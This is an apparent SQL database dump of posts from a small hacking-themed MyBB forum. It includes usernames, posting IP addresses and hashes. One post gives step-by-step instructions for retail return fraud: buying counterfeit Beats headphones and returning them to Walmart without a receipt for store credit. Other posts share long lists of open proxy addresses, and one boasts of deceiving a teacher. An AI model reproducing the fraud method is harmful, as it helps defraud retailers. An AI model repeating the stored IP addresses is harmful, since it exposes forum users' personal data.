'72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '01d12cfe47a6450787e9979ebc53d312', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2204', '468', '0', '16', '[TUT] Free Dre Beats [Unconfirmed]', '0', '5', 'Timmy', '1347853534', '[color=#FF0000]1. You will have to buy some fake Dr. Dre Beats before you could do this. They are cheap and you will make your money back. The best places to get these are websites like TradeTang.com, DealXtreme.com, and DHGate.com. There are many more like this, make a Google search for \"Chinese wholesale\" and you\'ll find some good sites. You could also search \"replica Dr. Dre Beats\" They will be no more then $50 and no less than $15.[/color] [color=#1E90FF]2. After you get your fake Dr. Dre Beats, make sure they look real. If they look like shit, then just return them and find more fake ones.[/color] [color=#FFD700]3. Go to a retailer that carries Beats, make sure you check first or else you\'ll look stupid. No matter what you do, don\'t choose Best Buy. The best bet is Walmart, there employees are stupid and don\'t care.[/color] 4. When you have picked your retailer, head on over there and tell them that you bought these for your brother as a gift and he doesn\'t have an iPod or listen to music so he doesn\'t need them. They will ask for a receipt, tell them that you don\'t have one. Most likely you will get store credit, say alright and go buy something you like, maybe real Beats! [color=#800000]Enjoy! Unconfirmed because I never tried it cuz I have dre beats already. Please use a VPN or call with Skype through [/color][url=http://l33thacking.net/thread-77.html]clownfish[/url].', '72.231.24.165', '1223104677', '1', '0', '5', '1347854100', '1', '4ca914b388ab8398350ef5281d43d18d', '0', '1347854100'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2205', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1347854204', '/me is trying to help LH get more active.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b693c33031543bd29be613b9a8635ed9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2206', '345', '2202', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347854254', '[quote=\'Timmy\' pid=\'2202\' dateline=\'1347853148\'] [quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\'] When I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for. [/quote] To be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH. [/quote] Okay? your post has nothing to do with the fact that I think it\'s plain.. I never said it was bad. Learn to read the posts please.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ac2ae5d276f07b3abc0ab0a8552635d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2207', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1347854296', 'Banned for banning the one who likes banning.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b77b1b93242b26b4c283aaf8ba2cc69c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2208', '435', '1984', '4', 'RE: Newbie Here', '0', '1', 't3h jok3r', '1347854389', 'No problem. Hope you are HQ and enjoy LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8bf7731834ce0697337f6d7e49ce28a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2209', '345', '2206', '63', 'RE: Need userbar! [Gamers]', '0', '5', 'Timmy', '1347854709', '[quote=\'NXK\' pid=\'2206\' dateline=\'1347854254\'] [quote=\'Timmy\' pid=\'2202\' dateline=\'1347853148\'] [quote=\'NXK\' pid=\'2191\' dateline=\'1347851351\'] When I find something I like, I still feel like it\'s plain. Like don\'t get me wrong it\'s amazing it\'s just not something i\'m looking for. [/quote] To be honest, you won\'t get any professional work done with like 2 novice GFX experts on a new forum unless you get paid work from outside of LH. [/quote] Okay? your post has nothing to do with the fact that I think it\'s plain.. I never said it was bad. Learn to read the posts please. [/quote] What i mean is that for now pick any good userbar then in future you can expect a better one because then we would have more graphic designers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cdf93ad31bdacf2bbedbaa8c93a61bde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2210', '469', '0', '3', '[Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347856289', 'I will clear all PMs on board today(9/17/12), because we need some space. It\'s not like we need more space or the site is going to slow down, but I\'m doing it just incase. I will be deleting all PMs in the INBOX. If you have any important PMs then please move it to any folder exempt inbox.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6b6d0b257102cf34f08ad89bd3c29851', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2211', '470', '0', '14', '[SHITLOAD][FRESH]Free proxy list', '0', '4', 'Triple H', '1347856939', '16-09-12 | Free Proxy Server List [code] 1.36.21.178:3128 103.3.221.154:8080 103.3.221.153:8080 103.247.23.26:8080 109.106.192.124:3128 110.137.47.23:8080 110.139.183.88:8080 111.68.97.178:8080 112.133.201.67:3128 112.125.42.20:10080 113.105.181.77:3128 113.106.194.222:82 113.207.124.165:8080 114.134.75.82:3128 114.80.130.220:13992 114.35.167.38:8080 114.80.130.220:17946 114.80.130.220:8000 114.80.130.220:25782 114.80.130.220:8080 114.80.130.220:8888 114.80.130.221:8001 114.80.130.221:8081 114.80.130.221:8085 114.80.130.221:8090 114.80.130.221:8118 114.80.130.221:8888 115.124.0.68:443 115.124.0.68:80 114.80.130.220:8001 114.80.130.220:8081 114.80.130.220:8090 114.80.130.221:8000 114.80.130.221:8080 114.80.130.220:8085 114.80.130.220:8118 114.80.130.220:8909 114.80.130.221:8909 117.218.37.18:3128 118.174.133.14:3128 118.142.35.126:3128 118.186.9.21:80 118.96.231.62:3128 118.96.251.234:8080 118.96.127.10:3128 118.96.151.221:3128 118.96.230.118:8080 118.97.47.35:3128 118.97.44.154:3128 118.97.210.75:3128 119.30.112.212:8080 119.46.68.228:443 119.18.145.147:8087 119.46.68.228:80 119.46.68.232:443 119.46.68.232:80 119.235.253.152:3128 121.15.167.231:8080 121.18.231.102:54321 121.18.231.98:31281 119.254.90.18:8080 121.101.211.31:3128 119.32.229.40:8909 121.18.231.102:19279 119.46.90.28:80 122.113.28.52:3128 122.155.12.151:3128 122.3.237.161:3128 122.56.15.70:80 122.72.124.2:80 122.72.124.31:80 122.72.80.106:80 122.72.80.108:80 122.72.80.101:80 123.125.116.243:6675 123.136.71.152:80 123.136.71.154:80 123.136.71.156:80 123.108.249.186:80 123.108.249.186:8080 124.158.18.230:443 124.158.18.230:80 124.207.162.119:80 124.158.9.32:3128 124.207.162.190:80 124.207.162.118:80 125.39.93.69:8888 125.76.237.68:80 125.39.93.68:8888 14.139.230.114:3128 133.26.102.121:80 125.165.50.254:8080 128.91.49.131:3128 173.15.194.228:3128 146.255.9.124:3128 173.219.189.95:3128 175.41.132.160:80 174.69.244.60:8080 176.31.107.35:3128 173.236.204.117:8080 177.103.215.233:3128 177.103.139.64:3128 177.103.229.35:80 178.157.62.242:80 177.64.155.216:8080 178.157.59.106:3128 178.63.84.146:3128 180.183.66.177:3128 180.244.223.223:3128 180.247.198.155:3128 183.89.17.221:3128 186.237.16.196:80 186.92.227.113:8080 187.44.1.171:8080 189.51.5.218:3128 189.8.69.36:80 189.26.236.87:3128 189.8.69.39:443 189.39.120.4:3128 189.8.69.39:80 189.84.112.118:3128 190.137.44.81:8080 190.146.1.162:3128 190.203.11.41:8080 190.66.1.39:8080 190.85.37.90:3128 190.85.37.90:8080 193.89.116.105:443 193.89.116.105:80 193.89.116.106:443 193.89.116.106:80 193.89.116.107:443 193.89.116.107:80 190.79.253.98:8080 190.79.66.27:8080 193.116.157.195:80 200.14.41.24:3128 200.14.46.105:3128 195.158.108.84:3128 200.146.104.121:3128 200.182.173.202:3128 200.54.92.187:3128 200.48.39.22:3128 200.54.92.187:80 200.94.17.249:3128 200.94.17.249:8080 200.249.144.86:6588 201.148.26.81:8080 201.116.187.236:3128 200.71.204.150:80 201.244.71.62:3128 201.236.80.197:3128 202.106.16.116:3128 202.106.16.20:3128 202.106.16.36:3128 202.106.16.68:3128 202.109.123.180:80 202.112.114.17:3128 201.39.174.82:3128 202.127.28.67:3128 202.162.198.178:8000 202.29.97.5:3128 202.3.247.118:80 202.143.146.199:8080 202.182.54.156:80 202.57.4.124:8089 202.66.128.126:3128 202.62.98.242:8080 202.182.54.158:80 202.71.99.222:80 202.91.81.116:8080 202.75.217.156:80 202.37.120.234:8080 202.90.128.162:3128 202.71.99.222:8080 202.98.123.126:8080 203.114.112.101:3128 203.172.188.34:80 203.189.89.153:8080 203.20.238.21:80 203.20.55.55:443 203.20.55.55:80 202.94.84.202:3128 203.20.55.57:443 203.20.55.57:80 202.96.136.169:3128 203.93.28.166:8080 203.77.246.60:3128 209.51.184.3:80 209.51.184.6:443 209.51.184.6:80 210.101.131.231:8080 210.13.71.73:80 210.13.71.76:80 202.95.155.55:3128 210.13.71.77:80 203.77.232.99:8080 203.93.104.20:80 209.62.12.130:8118 210.19.83.200:80 210.19.83.197:80 210.19.83.202:80 210.101.131.232:8080 210.76.127.35:3128 210.211.109.244:8081 206.17.82.114:80 208.51.184.58:3128 211.136.10.24:80 211.136.10.25:80 211.136.10.29:80 211.136.10.30:80 210.75.120.3:80 211.142.236.132:81 211.142.236.136:80 210.22.13.104:80 211.100.61.202:3128 211.161.152.100:80 211.100.49.9:3128 211.162.121.182:80 211.162.121.183:80 211.161.152.107:80 211.144.76.58:9000 212.33.245.235:3128 213.186.122.123:3128 213.42.124.107:80 211.94.93.224:3128 212.93.195.229:3128 217.219.129.20:80 217.219.129.20:3128 218.108.242.108:3128 218.16.145.109:8080 218.152.121.184:8080 218.241.153.43:8080 218.247.129.2:80 218.247.138.40:80 218.76.140.62:3128 218.63.168.253:3128 218.84.126.82:3128 218.26.251.168:1337 218.29.54.105:80 218.5.74.199:3128 219.230.71.82:3128 219.234.82.62:6666 219.234.82.62:8001 219.234.82.62:8000 219.234.82.62:8081 219.234.82.62:8085 219.133.36.198:80 218.94.1.166:82 219.234.82.62:8888 219.234.82.76:8909 219.234.82.62:8909 219.234.82.78:6666 219.234.82.78:14128 219.130.39.9:3128 219.234.82.78:80 219.234.82.78:8001 219.234.82.78:8080 219.234.82.78:8081 219.234.82.78:8085 219.234.82.62:8080 219.234.82.78:81 219.234.82.78:82 219.234.82.78:8090 219.234.82.78:83 219.234.82.78:84 219.234.82.62:8090 219.92.6.245:3128 220.225.4.250:8080 220.113.5.198:8080 219.94.243.100:8080 220.195.192.172:80 221.2.228.202:8000 221.2.174.164:8082 221.214.218.148:3128 221.229.255.50:3128 220.181.55.11:80 222.124.178.98:3128 222.127.106.89:3128 222.134.74.30:8080 222.197.181.5:3128 222.74.212.66:808 222.92.116.10:80 223.19.187.227:3128 222.74.98.234:8080 23.20.161.66:80 223.202.8.69:3128 41.189.36.26:3128 223.27.80.35:8080 41.222.209.77:8080 41.223.56.140:80 37.59.130.31:80 41.215.122.65:8080 41.75.201.146:3128 41.89.130.2:3128 41.72.213.94:8080 42.62.5.104:8080 42.62.5.104:8001 42.62.5.104:8081 42.62.5.104:6675 42.62.5.104:8000 42.62.5.104:8085 42.62.5.104:8090 42.62.5.104:8118 42.62.5.104:8888 41.78.239.194:8080 42.62.5.105:8080 42.62.5.105:8085 42.62.5.105:6675 42.62.5.105:8000 42.62.5.105:8888 42.62.5.105:8090 42.62.5.105:8001 42.62.5.105:8118 42.62.5.105:8081 42.62.5.106:8001 42.62.5.106:8080 42.62.5.106:8081 42.62.5.106:8085 42.62.5.106:8090 42.62.5.106:8118 5.9.227.148:3128 54.251.3.63:80 46.248.164.74:80 46.4.253.179:3128 58.215.177.239:3128 58.251.57.78:8001 58.215.170.154:3128 49.212.161.19:3128 46.252.244.178:3128 59.34.57.68:8080 59.125.100.113:3128 59.37.163.156:3128 59.34.1.151:8080 59.57.15.71:80 60.190.129.52:3128 60.2.227.123:3128 60.28.219.218:80 60.32.73.46:80 61.152.176.48:80 60.28.213.42:80 61.135.208.184:80 61.156.217.166:8000 61.163.197.135:8080 61.19.197.236:3128 60.6.238.66:1337 61.7.252.67:3128 61.177.121.100:8888 61.247.59.183:8080 65.111.164.53:3128 62.75.161.165:3128 69.46.99.186:80 63.238.52.89:8080 74.86.2.131:8080 65.117.207.142:3128 65.117.207.142:8081 64.62.184.25:3128 71.189.47.2:8081 76.103.101.126:3128 77.38.171.87:8080 74.208.204.187:80 79.170.50.25:80 79.101.37.138:8080 80.241.82.10:3128 79.101.37.131:8080 77.222.128.230:3128 79.101.37.133:8080 80.58.250.68:80 82.193.116.28:3128 80.88.240.24:80 80.88.240.27:80 83.212.97.172:3128 81.214.15.106:8080 85.185.157.15:8080 85.192.166.187:3128 81.82.240.204:3128 86.111.144.194:3128 88.146.161.215:3128 85.234.22.126:3128 87.98.217.114:80 91.121.58.235:3128 89.35.78.8:8080 90.150.144.46:8080 92.62.229.171:8080 94.23.56.105:80 91.120.127.127:3128 94.56.129.24:8080 94.56.135.125:80 92.242.241.81:3128 95.172.68.150:80 [/code]', '72.231.24.165', '1223104677', '1', '0', '1', '1347941113', '1', 'a075fe761c30d2485da547e986917f78', '0', '1347941113'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2298', '470', '2270', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '1', 't3h jok3r', '1347941431', '[quote=\'iTzIpod\' pid=\'2270\' dateline=\'1347935438\'] [quote=\'t3h jok3r\' pid=\'2265\' dateline=\'1347935070\'] [quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\'] @HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry. OT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down. (It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression) [/quote] [b]I counted and it takes 36 seconds to scroll down including sirchamps post.[/b] I will wait few hours, if the OP doesn\'t update then I will. [/quote] Sigh t3h jok3r... Are you serious? Lol Alright. I will be releasing my Proxy List soon. Don\'t worry it\'ll be in a .txt file (Notepad) [/quote] Maybe OP thought of giving it out instead of having people to download, because you know about me when I was in XXXXX my internet connection was too slow and it couldn\'t even download a file easily.', '173.245.64.5', '-1376436219', '1', '0', '0', '0', '1', '8dfcb19aa2cb66806ef411ac528145e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2299', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347941609', 'Damn it. I removed the download link for no reason then, do you have another DL link?', '173.245.64.5', '-1376436219', '1', '0', '0', '0', '1', '92f7f6e6def82b04342788da8d81060f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2212', '471', '0', '7', 'L33THackers is not L33THacking', '0', '1', 't3h jok3r', '1347857603', 'There was a guy that sent me a PM asking me if l33thackin.net is the new site of l33thackers.net,.com and .nl. The truth is that L33THacking.net is just a different site with the same theme. I came up with the name l33thackers first but since it was already in use I changed it to l33thacking. L33THacking.nets current theme is a free theme but with a lot of errors that\'s why it\'s unique NOT PAID. L33THacking.net and L33THackers.com are two different sites.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cbf7f90465868782f3b9db49bd84953f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2213', '462', '2198', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347875229', '[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\'] :/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone. [/quote] i came up with this: [img]http://i.imgur.com/VMmLc.png[/img] [hr] heres the facebook avatar (for t3h jok3r) just in case you like mine :) [img]http://i.imgur.com/qCK6A.png[/img]', '31.22.216.217', '521591001', '1', '0', '62', '1347875635', '1', '1b7f453e01417a0233d35abf91fa61ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2214', '431', '2166', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347877024', '[quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\'] LOL Gotta love the first one. Asian guy <3 Or he looks asian.. [/quote] thought jok3r loved asians, am I wrong? ^^', '31.22.216.217', '521591001', '1', '0', '0', '0', '1', '187cd302e5e53ed134bb88a7d0592dc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2215', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '20', 'JakeUS', '1347879193', 'Sounds like a good idea.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'f5682310ef616f62fbedcddf1cf05e30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2216', '431', '2176', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347880588', '[quote=\'iTzIpod\' pid=\'2176\' dateline=\'1347845009\'] [quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\'] Lol ipod. Size: about the same size as yours Reloadzor Colour Scheme: silver, grey Render/Image: you choose, im not very creative :) Text: ??????Z Cheers pal [/quote] Wait. You didn\'t state what you wanted. Avatar Signature/Tag Banner Etc? [/quote] ah yeah my bad, post edited', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '6dfa39d767e1df4b918e95bb93e26e8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2217', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '112', '??????Z', '1347880872', 'try buying it in england, $700 starting price', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'abca939738b8e39cec7bcf0e6ba66c0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2218', '431', '2174', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347888951', '[quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\'] Lol ipod. Size: about the same size as yours Reloadzor Colour Scheme: silver, grey Render/Image: you choose, im not very creative :) Text: ??????Z Signature + avatar please buddy :) Cheers pal [/quote] Hope you like it: [img]http://i.imgur.com/lkLHB.png[/img] will make an avatar matching the sig if you liked it.', '95.69.91.226', '1598381026', '1', '0', '62', '1347889093', '1', '7b88b8f9462b7bd6a88e1a20addba3bf', '0', '1347889093'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2219', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '61', 'NXK', '1347890940', 'Id suggest not publicy posting a upload/sell method since you can get it explioted.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '4d738fc0db5ff53a333b4684e54928b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2220', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '61', 'NXK', '1347890999', 'Ill be trying this out After class, have you used this at all?', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '575320e063ad9c18827020d787c555c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2221', '472', '0', '7', 'School story', '0', '61', 'NXK', '1347892813', 'Sitting on my computer in my class, teacher walks up and sees me on l33t hacking.. asks me why i`m on a hacking forum in the middle of class. i think about what iv`e learned from social engineering, convince the teach this is a 100% white hat hacking forum based on tweeking windows to make your pc run faster. It was a close one because he was explaining to me that I could have been in alot of trouble.', '38.104.158.106', '644390506', '1', '0', '61', '1347895964', '1', '4564277a5678246cdcc7dac2423f2f43', '0', '1347895964'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2222', '472', '2221', '7', 'RE: School story', '0', '62', 'R?????zo?', '1347894172', 'you just SE\'ed your teacher haha, even though he might investigate about this website later..', '95.69.91.226', '1598381026', '1', '0', '0', '0', '1', 'eed4c0c714c05d0be17b2a331ec86b63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2223', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '53', 'sirchamp', '1347895225', 'Firstly thanks for the list. I tested all of the proxies. Here are the ones that work: [code] 1.36.21.178:3128 103.3.221.154:8080 103.3.221.153:8080 103.247.23.26:8080 109.106.192.124:3128 110.137.47.23:8080 110.139.183.88:8080 111.68.97.178:8080 112.133.201.67:3128 112.125.42.20:10080 113.105.181.77:3128 113.106.194.222:82 113.207.124.165:8080 114.134.75.82:3128 114.80.130.220:13992 114.35.167.38:8080 114.80.130.220:17946 114.80.130.220:8000 114.80.130.220:25782 114.80.130.220:8080 114.80.130.220:8888 114.80.130.221:8001 114.80.130.221:8081 114.80.130.221:8085 114.80.130.221:8090 114.80.130.221:8118 114.80.130.221:8888 115.124.0.68:443 115.124.0.68:80 114.80.130.220:8001 114.80.130.220:8081 114.80.130.220:8090 114.80.130.221:8000 114.80.130.221:8080 114.80.130.220:8085 114.80.130.220:8118 114.80.130.220:8909 114.80.130.221:8909 117.218.37.18:3128 118.174.133.14:3128 118.142.35.126:3128 118.186.9.21:80 118.96.231.62:3128 118.96.251.234:8080 118.96.127.10:3128 118.96.151.221:3128 118.96.230.118:8080 118.97.47.35:3128 118.97.44.154:3128 118.97.210.75:3128 119.30.112.212:8080 119.46.68.228:443 119.18.145.147:8087 119.46.68.228:80 119.46.68.232:443 119.46.68.232:80 119.235.253.152:3128 121.15.167.231:8080 121.18.231.102:54321 121.18.231.98:31281 119.254.90.18:8080 121.101.211.31:3128 119.32.229.40:8909 121.18.231.102:19279 119.46.90.28:80 122.113.28.52:3128 122.155.12.151:3128 122.3.237.161:3128 122.56.15.70:80 122.72.124.2:80 122.72.124.31:80 122.72.80.106:80 122.72.80.108:80 122.72.80.101:80 123.125.116.243:6675 123.136.71.152:80 123.136.71.154:80 123.136.71.156:80 123.108.249.186:80 123.108.249.186:8080 124.158.18.230:443 124.158.18.230:80 124.207.162.119:80 124.158.9.32:3128 124.207.162.190:80 124.207.162.118:80 125.39.93.69:8888 125.76.237.68:80 125.39.93.68:8888 14.139.230.114:3128 133.26.102.121:80 125.165.50.254:8080 128.91.49.131:3128 173.15.194.228:3128 146.255.9.124:3128 173.219.189.95:3128 175.41.132.160:80 174.69.244.60:8080 176.31.107.35:3128 173.236.204.117:8080 177.103.215.233:3128 177.103.139.64:3128 177.103.229.35:80 178.157.62.242:80 177.64.155.216:8080 178.157.59.106:3128 178.63.84.146:3128 180.183.66.177:3128 180.244.223.223:3128 180.247.198.155:3128 183.89.17.221:3128 186.237.16.196:80 186.92.227.113:8080 187.44.1.171:8080 189.51.5.218:3128 189.8.69.36:80 189.26.236.87:3128 189.8.69.39:443 189.39.120.4:3128 189.8.69.39:80 189.84.112.118:3128 190.137.44.81:8080 190.146.1.162:3128 190.203.11.41:8080 190.66.1.39:8080 190.85.37.90:3128 190.85.37.90:8080 193.89.116.105:443 193.89.116.105:80 193.89.116.106:443 193.89.116.106:80 193.89.116.107:443 193.89.116.107:80 190.79.253.98:8080 190.79.66.27:8080 193.116.157.195:80 200.14.41.24:3128 200.14.46.105:3128 195.158.108.84:3128 200.146.104.121:3128 200.182.173.202:3128 200.54.92.187:3128 200.48.39.22:3128 200.54.92.187:80 200.94.17.249:3128 200.94.17.249:8080 200.249.144.86:6588 201.148.26.81:8080 201.116.187.236:3128 200.71.204.150:80 201.244.71.62:3128 201.236.80.197:3128 202.106.16.116:3128 202.106.16.20:3128 202.106.16.36:3128 202.106.16.68:3128 202.109.123.180:80 202.112.114.17:3128 201.39.174.82:3128 202.127.28.67:3128 202.162.198.178:8000 202.29.97.5:3128 202.3.247.118:80 202.143.146.199:8080 202.182.54.156:80 202.57.4.124:8089 202.66.128.126:3128 202.62.98.242:8080 202.182.54.158:80 202.71.99.222:80 202.91.81.116:8080 202.75.217.156:80 202.37.120.234:8080 202.90.128.162:3128 202.71.99.222:8080 202.98.123.126:8080 203.114.112.101:3128 203.172.188.34:80 203.189.89.153:8080 203.20.238.21:80 203.20.55.55:443 203.20.55.55:80 202.94.84.202:3128 203.20.55.57:443 203.20.55.57:80 202.96.136.169:3128 203.93.28.166:8080 203.77.246.60:3128 209.51.184.3:80 209.51.184.6:443 209.51.184.6:80 210.101.131.231:8080 210.13.71.73:80 210.13.71.76:80 202.95.155.55:3128 210.13.71.77:80 203.77.232.99:8080 203.93.104.20:80 209.62.12.130:8118 210.19.83.200:80 210.19.83.197:80 210.19.83.202:80 210.101.131.232:8080 210.76.127.35:3128 210.211.109.244:8081 206.17.82.114:80 208.51.184.58:3128 211.136.10.24:80 211.136.10.25:80 211.136.10.29:80 211.136.10.30:80 210.75.120.3:80 211.142.236.132:81 211.142.236.136:80 210.22.13.104:80 211.100.61.202:3128 211.161.152.100:80 211.100.49.9:3128 211.162.121.182:80 211.162.121.183:80 211.161.152.107:80 211.144.76.58:9000 212.33.245.235:3128 213.186.122.123:3128 213.42.124.107:80 211.94.93.224:3128 